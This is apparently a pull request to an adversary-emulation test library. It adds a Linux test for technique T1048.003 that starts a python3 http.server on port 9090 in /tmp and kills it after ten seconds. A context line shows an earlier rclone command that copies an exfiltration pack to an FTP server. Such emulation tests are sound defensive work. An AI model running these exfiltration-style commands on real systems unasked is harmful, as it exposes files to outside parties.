### PR TITLE
T1048.003 Python3 http.server

### DIFF
--- a/atomics/T1048.003/T1048.003.yaml
+++ b/atomics/T1048.003/T1048.003.yaml
@@ -205,3 +205,13 @@ atomic_tests:
       &$rclone_bin copy --max-age 2y $exfil_pack ftpserver --bwlimit 2M -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12 -P --ftp-no-check-certificate
     name: powershell
     elevation_required: true
+- name: Python3 http.server
+  description: |
+    An adversary may use the python3 standard library module http.server to exfiltrate data. This test checks if python3 is available and if so, creates a HTTP server on port 9090, captures the PID, sleeps for 10 seconds, then kills the PID and unsets the $PID variable.
+  supported_platforms:
+  - linux
+  executor:
+    name: sh
+    elevation_required: false
+    command: |
+      if [ $(which python3) ]; then cd /tmp; python3 -m http.server 9090 & PID=$!; sleep 10; kill $PID; unset PID; fi


### PR DESCRIPTION
**Details:**
Added a test for python3 standard library module http.server.

**Testing:**
Tested on ubuntu 22.04 & rhel 8.7

![T1048 003 Python3 http server](https://user-images.githubusercontent.com/121760096/215258122-02e0ed77-9222-4cfc-815a-0869bf59ac71.png)

